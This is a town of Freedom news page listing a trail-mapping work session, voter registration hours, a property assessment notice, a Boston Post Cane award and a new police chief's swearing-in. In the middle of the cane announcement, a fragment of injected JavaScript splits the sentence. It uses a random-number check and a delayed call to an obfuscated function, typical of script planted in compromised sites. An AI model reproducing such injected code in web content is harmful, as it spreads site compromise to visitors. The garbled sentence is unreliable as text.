Work Session for Town Forest Trail Mapping

There will also be a work session May 27, 2022 attended by Freedom Conservation Commission and other Town Officials to work on the Town Forest Trail Mapping for emergency response at the Freedom Town Hall located at 16 Elm St. at 4:00 p.m.

The Supervisors of the Checklist for the Town of Freedom will hold a session for accepting applications for new voter registration, accepting requests for corrections to the checklist, and/or change of political party affiliation on:

Time: 7:00 PM to 8:00 PM

Location: Freedom Town Hall

To register, you will need to provide proof of your identity, age, citizenship, and domicile (residence). Proof can be either by documents, or if you do not have documents with you by sworn affidavit.

We still recommend wearing a mask and continuing the practice of social distancing.

Important Notice to FREEDOM Property Owners (*Maps 3-7 specifically, excluding Freedom Village Condos)

The Town of FREEDOM annually reviews 20% of the properties in Town to verify that the property record assessment data is accurate. Your area* of Town is scheduled to be reviewed this year. A representative of the assessing office will be visiting your property in the coming weeks to verify property data. Due to COVID-19 interior inspection will not be performed. The assessing representative will notify the occupants that they are on site, ask a few questions about the interior and complete the exterior inspection and measurements.

The individual will have a picture ID and a letter of introduction from the Town. The Town asks for your cooperation in this process, so that we may have fair and accurate assessment data.

At the Selectmen’s Meeting held on Monday, June 7, 2021, Chairman Les Babb presented Freedom resident Velma Hormell with a proclamation andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and the Boston Post Cane.  At 96 years young, Velma is the 25th Freedom resident, as well as the fourth member of her family to receive the cane.


Officer Jamie Mullen was sworn-in as Freedom’s Police Chief during the Selectmen’s Meeting held on Monday, June 7, 2021.  Mullen was promoted by the Board of Selectmen following Chief Josh Shackford’s announcement of retirement effective June 3, 2021.
